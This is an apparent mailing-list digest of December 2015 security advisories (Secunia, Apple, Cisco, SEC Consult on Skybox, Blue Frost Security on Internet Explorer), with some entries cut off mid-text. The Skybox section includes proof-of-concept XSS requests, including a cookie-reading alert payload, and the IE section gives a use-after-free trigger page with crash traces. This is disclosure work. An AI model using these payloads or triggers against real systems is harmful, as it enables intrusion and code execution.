PtVldqDFMIeUp9goguCynCRspduoFPHYqGlPwdolurNZ+5FhO3nrzYv1kIwXY4oj nk/wv5hEpWXiZseO92jXX2LydVDMURCBDRkyANB4sISb8y3kOUjnWYa48pzKHIl2 +go5lQjeJswlY/OQxLJ74Kk+XIOubIJyh2vN26SqbOkELS67EGXNJfLW/uGsvMqP buhsvYJLhM9SxAXwtbf9ld7/58/XlKPyGMY8M/BFpVdii5JT9AgORMzl06/Vxk2M mvuUmJW8jyLvi0pB8bYGcByFrfxY58/wAEgiw/Y+71QjBVAqi6Lu1pOzxW0o8hz4 qm62jLluGkmq/dkmKDKz =xwRJ -END PGP SIGNATURE-
Secunia Research: Microsoft Windows usp10.dll "GetFontDesc()" Integer Underflow Vulnerability
== Secunia Research 08/12/2015 Microsoft Windows usp10.dll "GetFontDesc()" Integer Underflow Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * Microsoft Windows 7 * Microsoft Windows Server 2008 == 2) Severity Rating: Highly critical Impact: System Access Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an integer underflow error within the "GetFontDesc()" function in usp10.dll when processing font files cmap table and can be exploited to cause a heap-based buffer overflow via a font file containing cmap table data with specially crafted offset within encoding records. Successful exploitation allows execution of arbitrary code. == 4) Solution Apply update provided by MS15-130. == 5) Time Table 09/10/2015 - Vendor notified. 12/10/2015 - Vendor response. 17/10/2015 - Status update provided by the vendor. 28/10/2015 - Vendor provides December 2015 as intended fix date. 08/12/2015 - Release of vendor patch and public disclosure. == 6) Credits Discovered by Hossein Lotfi, Secunia Research (now part of Flexera Software). == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2015-6130 identifier for the vulnerability. == 8) About Secunia (now part of Flexera Software) In September 2015, Secunia has been acquired by Flexera Software: https://secunia.com/blog/435/ Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/products/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/company/jobs/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2015-6/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
APPLE-SA-2015-12-08-6 Xcode 7.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 APPLE-SA-2015-12-08-6 Xcode 7.2 Xcode 7.2 is now available and addresses the following: Git Available for: OS X Yosemite v10.10.5 or later Impact: Multiple vulnerabilities existed in Git Description: Multiple vulnerabilities existed in Git versions prior to 2.5.4. These were addressed by updating Git to version 2.5.4. CVE-ID CVE-2015-7082 IDE SCM Available for: OS X Yosemite v10.10.5 or later Impact: Intentionally untracked files may be uploaded to repositories Description: Xcode did not honor the .gitignore directive. This issue was addressed by adding support to honor .gitignore file. CVE-ID CVE-2015-7056 : Stephen Lardieri otools Available for: OS X Yosemite v10.10.5 or later Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in the processing of mach-o files. These issues were addressed through improved memory handling. CVE-ID CVE-2015-7049 : Proteas of Qihoo 360 Nirvan Team CVE-2015-7057 : Proteas of Qihoo 360 Nirvan Team Installation note: Xcode 7.2 may be obtained from: https://developer.apple.com/xcode/downloads/ To check that the Xcode has been updated: * Select Xcode in the menu bar * Select About Xcode * The version after applying this update will be "7.2". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- Comment: GPGTools - https://gpgtools.org iQIcBAEBCgAGBQJWZzRaAAoJEBcWfLTuOo7td2kP/Ag61Qpz8uA8MgClf9SbFJau FNMDPV7ZOLPPc+DA37rQIwQemSe8dkt4Jnc6TOcTQdR7+f+Mt0QgscDW9xlOlYT4 Ofg5h5XnrKQ02DBkptD4ms5RH8JAHDKCYj8WttlBnBVsJMb6H3s5Om6vfubXkb7t 6bdUMe7iCgRsGuRrBuzPfxjMzh2ilnWML1B6VJkRi6rMnWTW2a66BWvfqLL1Cv2h 1ybIaJi1wsw0lTxGIb+bNM8lg+EL4JLEV+DSJ6mFtDpF6dQBqndbxjopbO5l6LzT rnWtFTQQ1/6SAM11n9bbDOQj8w8QW3v0CAyad4HN+5Ayk/qnuJZ8o1ycSGAIrQgr HCzG8RELjK9ipgkdu5daXUc75SGVPuuwobQM6SNzrg5M6SVzIvVdSibTwfgnDvgu PQO6mBZXLewSBoWqJAQnoDJXExSJ67IE5RzXwvg5KQcF+81Toj48HUxxd98PKrnI gPbhf8QT9/asGupN4wh3JjN73/qm2BwpJsbPvVj42Ew1OnsBgldpEL1Ssl/2qX0O pPi1pfF6PIFQUrbloWyYC+lIJuydb3FZUYKLR6HSn7v7RrZu5n8Uvj+5VX3TyVOi 5WzXvbHd9L3exphb8SnITTUdZX6LzkUgRrQRvGWTzT/AfIHQRAyliyk7BgYRqzHH ObtqW74YB0YXaiw1ckGl =FxUB -END PGP SIGNATURE-
Cisco Security Advisory: Vulnerability in Java Deserialization Affecting Cisco Products
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco Security Advisory: Vulnerability in Java Deserialization Affecting Cisco Products Advisory ID: cisco-sa-20151209-java-deserialization Revision 1.0 For Public Release: 2015 December 9 16:00 GMT +- Summary === A vulnerability in the Java deserialization used by the Apache Commons Collections (ACC) library could allow an unauthenticated, remote attacker to execute arbitrary code. The vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by submitting crafted input to an application on a targeted system that uses the ACC library. After the vulnerable library on the affected system deserializes the content, the attacker could execute arbitrary code on the system, which could be used to conduct further attacks. On November 6, 2015, Foxglove Security Group published information about a remote code execution vulnerability that affects multiple releases of the ACC library. The report contains detailed proof-of-concept code for a number of applications, including WebSphere Application Server, JBoss, Jenkins, OpenNMS, and WebLogic. This is a remotely exploitable vulnerability that allows an attacker to inject any malicious code or execute any commands that exist on the server. A wide range of potential impacts includes allowing the attacker to obtain sensitive information. Object serialization is a technique that many programming languages use to convert an object into a sequence of bits for transfer purposes. Deserialization is a technique that reassembles those bits back to an object. This vulnerability occurs in Java object serialization for network transport and object deserialization on the receiving side. Many applications accept serialized objects from the network without performing input validation checks before deserializing it. Crafted serialized objects can therefore lead to execution of arbitrary attacker code. Although the problem itself is in the serialization and deserialization functionality of the Java programming language, the ACC library is known to be affected by this vulnerability. Any application or application framework could be vulnerable if it uses the ACC library and deserializes arbitrary, user-supplied Java serialized data. Additional details about the vulnerability are available at the following links: Official Vulnerability Note from CERT: http://www.kb.cert.org/vuls/id/576313 Foxglove Security: http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ Apache Commons Statement: https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread Oracle Security Alert: https://blogs.oracle.com/security/entry/security_alert_cve_2015_4852 Cisco will release software updates that address this vulnerability. There are no workarounds that mitigate this vulnerability. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization -BEGIN PGP SIGNATURE- Comment: GPGTools - http://gpgtools.org iQIcBAEBCAAGBQJWaE9BAAoJEIpI1I6i1Mx31a0QALya6VDmcGiyx3AlCzsKGISc 3NJP4PPjVFGjHQmB/+bXn1zXLZ63JgbOZuG9pLxhmJpPMxQI8jeXEHqzVmrA9cOj u/QRGkITxQaRS50cwFJXPDOVWWCTcHLhuk83Ofih8vhC8UPBy1FGMBl5rpVLDkG9 ue8yX5ACEQ078F78dpcnJmbv1Hxu021wI+nM3pn7C/aOrJ1wSNop8KkFZ+VHzbKY aeuMFqhal+ePx+JoIC4JMrTll/BLxjI17tKrzXas6D4zKNGSO0WxnEFjDWuPlc89 2y3DnaVc0eeAVPy3ODN6wJzuro4w69z1GrvXPkBfVe9WNKD1lMGRUPMRwnb/zjxu DT8Ms4LDaVCLDZ01ox3BpuZIDBP1q2Xk6ToObeHUNMSDM9IuMeVOz9BtxJxO8Yp/ YfVaoqkM6Vrf5oXKUvWow0r19+ODp18JUnc8qT7Cj0b9PwtlOUqpsNE+cAzPyZh7 UBYLPm2AZypOgw4ryUf66p3l+NGLvLdA+A1u0m+YfXSrsuEFCosUeppmZMvgzEME 7TDSbOlt6yj9W/U3ioYbhLWk1D2whTyDybXz4MLaPTPxfxozyePOcthU7R/PVGrU M0Do8nugnDXE0rYVRooF3+A/6ahoKUb9QR00O4xN4A94lfXqgc6t+180S4vavgxS g9ZP7zYVhaDCRufDoNVI =nsL1 -END PGP SIGNATURE-
APPLE-SA-2015-12-08-3 OS X El Capitan 10.11.2 and Security Update 2015-008
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 APPLE-SA-2015-12-08-3 OS X El Capitan 10.11.2 and Security Update 2015-008 OS X El Capitan 10.11.2 and Security Update 2015-008 is now available and addresses the following: apache_mod_php Available for: OS X El Capitan v10.11 and v10.11.1 Impact: Multiple vulnerabilities in PHP Description: Multiple vulnerabilities existed in PHP versions prior to 5.5.29, the most serious of which may have led to remote code execution. These were addressed by updating PHP to version 5.5.30. CVE-ID CVE-2015-7803 CVE-2015-7804 AppSandbox Available for: OS X El Capitan v10.11 and v10.11.1 Impact: A malicious application may maintain access to Contacts after having access revoked Description: An issue existed in the sandbox's handling of hard links. This issue was addressed through improved hardening of the app sandbox. CVE-ID CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi of TU Darmstadt Bluetooth Available for: OS X El Capitan v10.11 and v10.11.1 Impact: A local user may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in the Bluetooth HCI interface. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7108 : Ian Beer of Google Project Zero CFNetwork HTTPProtocol Available for: OS X El Capitan v10.11 and v10.11.1 Impact: An attacker with a privileged network position may be able to bypass HSTS Description: An input validation issue existed within URL processing. This issue was addressed through improved URL validation. CVE-ID CVE-2015-7094 : Tsubasa Iinuma (@llamakko_cafe) of Gehirn Inc. and Muneaki Nishimura (nishimunea) Compression Available for: OS X El Capitan v10.11 and v10.11.1 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: An uninitialized memory access issue existed in zlib. This issue was addressed through improved memory initialization and additional validation of zlib streams. CVE-ID CVE-2015-7054 : j00ru Configuration Profiles Available for: OS X El Capitan v10.11 and v10.11.1 Impact: A local attacker may be able to install a configuration profile without admin privileges Description: An issue existed when installing configuration profiles. This issue was addressed through improved authorization checks. CVE-ID CVE-2015-7062 : David Mulder of Dell Software CoreGraphics Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, OS X El Capitan v10.11 and v10.11.1 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team CoreMedia Playback Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, OS X El Capitan v10.11 and v10.11.1 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the processing of malformed media files. These issues were addressed through improved memory handling. CVE-ID CVE-2015-7074 : Apple CVE-2015-7075 Disk Images Available for: OS X El Capitan v10.11 and v10.11.1 Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of disk images. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7110 : Ian Beer of Google Project Zero EFI Available for: OS X El Capitan v10.11 and v10.11.1 Impact: A local user may be able to execute arbitrary code with system privileges Description: A path validation issue existed in the kernel loader. This was addressed through improved environment sanitization. CVE-ID CVE-2015-7063 : Apple File Bookmark Available for: OS X El Capitan v10.11 and v10.11.1 Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: A path validation issue existed in app scoped bookmarks. This was addressed through improved environment sanitization. CVE-ID CVE-2015-7071 : Apple Hypervisor Available for: OS X El Capitan v10.11 and v10.11.1 Impact: A local user may be able to execute arbitrary code with system privileges Description: A use after free issue existed in the handling of VM objects. This issue was addressed through improved memory management. CVE-ID CVE-2015-7078 : Ian Beer of Google Project Zero iBooks Available for: OS X El Capitan v10.11 and v10.11.1 Impact: Parsing a maliciously crafted iBooks file may lead to disclosure of user information Description: An XML external entity reference issue existed with iBook parsing. This issue was addressed through improved parsing. CVE-ID CVE-2015-7081 : Behrouz Sadeghipour (@Nahamsec) and
SEC Consult SA-20151210-0 :: Skybox Platform Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 SEC Consult Vulnerability Lab Security Advisory < 20151210-0 > === title: Multiple Vulnerabilities product: Skybox Platform vulnerable version: <=7.0.611 fixed version: 7.5.401 CVE number: impact: Critical homepage: www.skyboxsecurity.com/products/appliance found: 2014-12-04 by: K. Gudinavicius, M. Heinzl, C. Schwarz (Office Singapore) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: - --- "Skybox Security provides cutting-edge risk analytics for enterprise security management. Our solutions give you complete network visibility, help you eliminate attack vectors, and optimize your security management processes. Protect the network and the business." Source: http://www.skyboxsecurity.com/ Business recommendation: - Attackers are able to perform Cross-Site Scripting and SQL Injection attacks against the Skybox platform. Furthermore, it is possible for unauthenticated attackers to download arbitrary files and execute arbitrary code. SEC Consult recommends the vendor to conduct a comprehensive security analysis, based on security source code reviews, in order to identify all available vulnerabilities in the Skybox platform and increase the security of its customers. Vulnerability overview/description: - --- 1) Multiple Reflected Cross-Site Scripting Vulnerabilities 2) Multiple Stored Cross-Site Scripting Vulnerabilities 3) Arbitrary File Download and Directory Traversal Vulnerability 4) Blind SQL Injection Vulnerability 5) Remote Unauthenticated Code Execution Proof of concept: - - 1) Multiple Reflected Cross-Site Scripting Vulnerabilities Multiple scripts are prone to reflected Cross-Site Scripting attacks. The following example demonstrates this issue with the service VersionRepositoryWebService: POST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0 Content-type: text/plain User-Agent: Axis/1.4 Host: localhost:8282 SOAPAction: "" Content-Length: 863 http://schemas.xmlsoap.org/soap/envelope/; xmlns:xsd="http://www.w3.org/2001/XMLSchema; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance;>http://schemas.xmlsoap.org/soap/encoding/; xmlns:ns1="http://com/skybox/view/webservice/versionrepositoryc4f85 t;a xmlns:a=http://www.w3.org/1999/xhtmla:body onload=alert(1)//a9884933253b">http://schemas.xmlsoap.org/soap/encoding/;>Applicationhttp://schemas.xmlsoap.org/soap/encoding/;>windows-64http://schemas.xmlsoap.org/soap/encoding/;>7.0.601 Other scripts and parameters, such as the parameter status of the login script (located at https://localhost:444/login.html) are affected as well. The following request demonstrates this issue: https://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28doc ument.cookie%29%3C/script%3E 2) Multiple Stored Cross-Site Scripting Vulnerabilities Multiple fields of the Skybox Change Manager, which can be accessed at https://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting attacks. For example when creating a new ticket, the title can be misused to insert JavaScript code. The following request to the server demonstrates the issue: Request: POST /skyboxview/webskybox/tickets HTTP/1.1 Host: localhost:8443 [...] 7|0|18|https://localhost:8443/skyboxview/webskybox/|2725E|com.skybox.view.g wt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.trans fer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer .modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phas es.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer. netmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.vi ew.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel. TicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItem Id/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/8 52682809||skyboxview|test">|java.util.ArrayList/41 Other fields, like "Comments" and "Description", are affected as well. 3) Arbitrary File Download and Directory Traversal Vulnerability Skybox Change Manager allows to upload and download attachments for tickets. The download functionality can be exploited to download arbitrary files. No authentication is required to exploit this vulnerability.
BFS-SA-2015-003: Internet Explorer CObjectElement Use-After-Free Vulnerability
Blue Frost Security GmbH https://www.bluefrostsecurity.de/ research(at)bluefrostsecurity.de BFS-SA-2015-003 10-December-2015 Vendor: Microsoft, http://www.microsoft.com Affected Products: Internet Explorer Affected Version: IE 11 Vulnerability: MSHTML!CObjectElement Use-After-Free Vulnerability CVE ID: CVE-2015-6152 I. Impact This vulnerability allows the execution of arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. II. Vulnerability Details Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in the MSHTML!CTreeNode::ComputeFormatsHelper function. The analysis was performed on Internet Explorer 11 running on Windows 7 SP1 (x64). The following HTML page can be used to reproduce the issue: small{ -ms-block-progression: lr; -ms-filter: "vv"; } function trigger() { document.execCommand("JustifyLeft"); } bluefrost security trigger(); With page heap enabled and the Memory Protect feature turned off, visiting that page results in the following crash: (2d4.830): Access violation - code c005 (!!! second chance !!!) eax=09b09e90 ebx=125b4e60 ecx= edx=6e9fedf0 esi=0f552fa0 edi=0f552fa0 eip=6dfcc19b esp=097fb520 ebp=097fc1f0 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 MSHTML!CTreeNode::ComputeFormatsHelper+0x53: 6dfcc19b f740240300 testdword ptr [eax+24h],3h ds:002b:09b09eb4= 0:007> !heap -p -a @eax address 09b09e90 found in _DPH_HEAP_ROOT @ 9b01000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 9b01f04: 9b09000 2000 748090b2 verifier!AVrfDebugPageHeapFree+0x00c2 77e61b1c ntdll!RtlDebugFreeHeap+0x002f 77e1ae8a ntdll!RtlpFreeHeap+0x005d 77dc2b65 ntdll!RtlFreeHeap+0x0142 758814ad kernel32!HeapFree+0x0014 6d92d219 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x0122 6dc46583 MSHTML!CObjectElement::`vector deleting destructor'+0x0023 6dfce0db MSHTML!CElement::PrivateRelease+0x027e 6d98953d MSHTML!CObjectElement::DeferredFallback+0x033d 6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x017b 6d95577e MSHTML!GlobalWndProc+0x012e 770762fa user32!InternalCallWinProc+0x0023 77076d3a user32!UserCallWinProcCheckWow+0x0109 770777c4 user32!DispatchMessageWorker+0x03bc 7707788a user32!DispatchMessageW+0x000f 6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x0464 6ec38de8 IEFRAME!LCIETab_ThreadProc+0x03e7 76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x0067 747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x0094 7588336a kernel32!BaseThreadInitThunk+0x000e 77dc9882 ntdll!__RtlUserThreadStart+0x0070 77dc9855 ntdll!_RtlUserThreadStart+0x001b We can see that a freed CObjectElement object is accessed in the MSHTML!CTreeNode::ComputeFormatsHelper function. If we take a look at the memory just before the CObjectElement destructor is called, we can see where the object was initially allocated. 0:007> bu MSHTML!CObjectElement::~CObjectElement 0:007> g Breakpoint 0 hit eax=6daf6b10 ebx= ecx=0980de90 edx=0f834bb0 esi=0980de90 edi=094bc324 eip=6dc4658f esp=094bc310 ebp=094bc318 iopl=0 nv up ei ng nz na pe cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0287 MSHTML!CObjectElement::~CObjectElement: 0:007> !heap -p -a poi(@esp+4) address 09b09e90 found in _DPH_HEAP_ROOT @ 9b01000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 9b01f04: 9b09e90 170 - 9b09000 2000 MSHTML!CObjectElement::`vftable' 74808e89 verifier!AVrfDebugPageHeapAllocate+0x0229 77e6134e ntdll!RtlDebugAllocateHeap+0x0030 77e1b16e ntdll!RtlpAllocateHeap+0x00c4 77dc2fe3 ntdll!RtlAllocateHeap+0x023a 6daf6a27 MSHTML!CObjectElement::CreateElement+0x0017 6e0423a4 MSHTML!CHtmParse::ParseBeginTag+0x00b8 6df17172 MSHTML!CHtmParse::ParseToken+0x0096 6df16a0f MSHTML!CHtmPost::ProcessTokens+0x04c7 6dd8341b MSHTML!CHtmPost::Exec+0x0207 6da308a8 MSHTML!CHtmPost::Run+0x003d 6da3080e MSHTML!PostManExecute+0x0061 6da2727c MSHTML!PostManResume+0x007b